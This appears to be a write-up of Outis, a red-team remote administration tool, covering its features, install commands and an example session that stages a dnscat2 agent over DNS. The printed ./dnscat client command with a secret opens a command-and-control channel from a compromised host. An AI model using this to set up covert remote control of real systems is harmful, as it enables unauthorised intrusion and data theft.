Outis is a custom Remote Administration Tool (RAT) that allows the user to communicate between the server and a target system which has already been compromised. It can allow the software to transfer files, share sockets, spawn sockets and perform numerous other tasks. It is built upon other similar tools such as Empire, Metasploit and ReflectiveDLLInjection.
Outis: Remote Administration Tool (RAT)
Outis is an all-round tool through which the user can perform various tasks. The currently supported transports are Reverse TCP and DNS. Outis allows the agent stages to be encoded and authenticated for additional security. This custom RAT also allows the user to ping requests to check the connection and upload or download files from the targeted system.
Features:
- Allows communication between server and target system
- Communication can be secured through various protocols.
– Encoding using cyclic XOR
– Authentication using RSA signatures and pinned certificates – Encrypted transport connections using TLS test
– Ping requests to test connection
– Text message format – Upload/download files
– Option to stage the tool dnscat2 / dnscat2-powershell outside the default outis agent using third-party tools.
– Reverse TCP
– DNS (different types for staging and agent connection)
Supported Platforms:
- Linux
Requirements:
- Python 3+
- Various Python packages (appdir, progressbar2, pycparser, pycrypto, pyOpenSSL, pyparsing, etc.)
Install
Clone the GitHub repo:
$ git clone https://github.com/SySS-Research/outis.git --recursive
Install the dependencies (example):
$ pip install progressbar2 dnspython pycrypto pyopenssl
Example
$ outis outis> set TRANSPORT DNS outis> set AGENTTYPE DNSCAT2 outis> set ZONE zfs.sy.gs outis> run [+] DNS listening on 0.0.0.0:53 [+] Sending staged agent (406569 bytes)... 100% (2185 of 2185) |#######################################################| Elapsed Time: 0:01:17 Time: 0:01:17 [+] Staging done [+] Starting dnscat2 to handle the real connection New window created: 0 New window created: crypto-debug Welcome to dnscat2! Some documentation may be out of date. auto_attach => false history_size (for new windows) => 1000 Security policy changed: All connections must be encrypted and authenticated New window created: dns1 Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = zfs.sy.gs]... Assuming you have an authoritative DNS server, you can run the client anywhere with the following (--secret is optional): ./dnscat --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== zfs.sy.gs To talk directly to the server without a domain name, run: ./dnscat --dns server=x.x.x.x,port=53 --secret=muzynL9ofNW+vymbGMLmi1W1QOT7jEJNYcCRZ1wy5fzTf1Y3epy1RuO7BcHJcIsBvGsZW9NvmQBUSVmUXMCaTg== Of course, you have to figure outyourself! Clients will connect directly on UDP port 53. dnscat2> New window created: 1 Session 1 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!)
